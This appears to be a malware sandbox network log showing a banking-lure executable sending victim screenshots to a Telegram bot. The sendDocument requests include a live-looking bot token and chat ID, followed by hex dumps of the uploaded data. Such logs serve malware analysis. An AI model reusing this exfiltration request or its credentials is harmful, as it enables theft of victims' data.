                                                                        2024-12-12 20:39:23 UTC16355OUTData Raw: c6 8d 08 a4 8a af 3e ee ab 23 be c8 3d 55 fd 21 fb 98 a3 12 50 92 90 1c 1d 03 96 c8 93 d4 f3 63 e0 88 30 12 50 95 7e 54 f6 49 ea d1 f7 b9 e5 7a ad 61 ec c5 9d 17 80 6a 7d 5f f2 8f 96 a3 c0 c4 22 01 08 3a d2 eb c5 5e 7b ab 4b b2 ec a3 da 8f b1 72 24 06 89 69 3e 57 01 ee 50 e1 2b ff ca 58 39 47 1f 01 28 61 27 51 07 5e fe 21 fa 38 e6 2b e9 27 b9 47 cb 7c 29 0f fd da 2c fe b4 77 2d e7 10 7b e0 45 1d 42 50 31 e5 49 12 2a 26 d9 e7 e7 b2 e0 b3 75 cc 69 1f 09 45 e6 f2 be 75 c5 1f e2 8e 56 7d 88 04 20 d0 47 f0 f9 39 e5 33 2f 01 48 ac e5 65 4f f4 5e 3a ff be ba 88 48 aa 0d 83 af dc f8 a1 94 ee df 2c a5 07 37 cf 15 7f 95 fc ab aa ff b2 14 7c 68 8b f4 bd db 8e 0e d7 76 e1 65 e0 7a c6 6c 0b 40 5a 24 20 fd a9 4a c0 48 d2 ad 2f 48 00 3e f3 cc 33 99 75 62 dd 38 4f db cf
                                                                        Data Ascii: >#=U!Pc0P~TIzaj}_":^{Kr$i>WP+X9G(a'Q^!8+'G|),w-{EBP1I*&uiEuV} G93/HeO^:H,7|hvezl@Z$ JH/H>3ub8O
                                                                        2024-12-12 20:39:24 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:24 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549814149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:27 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1caf7fff02ab
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 63 61 66 37 66 66 66 30 32 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1caf7fff02abContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:27 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:29 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:29 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549827149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:32 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1cfea10da911
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 63 66 65 61 31 30 64 61 39 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1cfea10da911Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
